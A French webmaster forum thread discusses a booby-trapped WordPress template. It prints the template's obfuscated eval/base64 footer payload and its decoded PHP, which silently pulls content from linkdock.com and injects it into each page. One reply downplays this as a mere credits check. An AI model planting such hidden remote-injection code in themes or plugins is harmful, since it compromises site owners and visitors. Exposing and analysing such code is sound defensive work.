Template Wordpress piégé ?

WRInaute impliqué
Bonjour,

J'ai téléchargé un template pour Wordpress sur le site wordpresstemplates.name

et quelle ne fut pas ma suprise de voir un bout de code caché dans le footer du template.

Code:
<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>

en le passant décodeur :
http://www.tareeinternet.com/scripts/decrypt.php


Ca done ça ....

Code:
error_reporting(0);$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {	echo @file_get_contents($CodeURL);} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {	$content = @file($CodeURL);	echo @join("", $content);} elseif (function_exists("curl_init")) {	$ch = curl_init($CodeURL);	curl_setopt($ch, CURLOPT_HEADER, 0);	curl_exec($ch);	curl_close($ch);}

Quelcun a une idée de l'action de ce code php ??
 
WRInaute accro
C'est ça. Ca fait appel à une page externe, probablement sur le site de l'auteur du template pour vérifier que tu place correctement les crédits.

C'est le genre de chose qui a tendance à me saouler. J'y laisse les crédits. Mais je supprime leur appel à la c***
 
WRInaute accro
Sans oublier ceux qui vont te coller des liens cachés dans le template ... (en plus de ceux visible, évidement). Plutôt fun pour ceux qui prennent le template et qui ne connaisse pas suffisamment html et css pour s'en apercevoir ...
 
Discussions similaires
Haut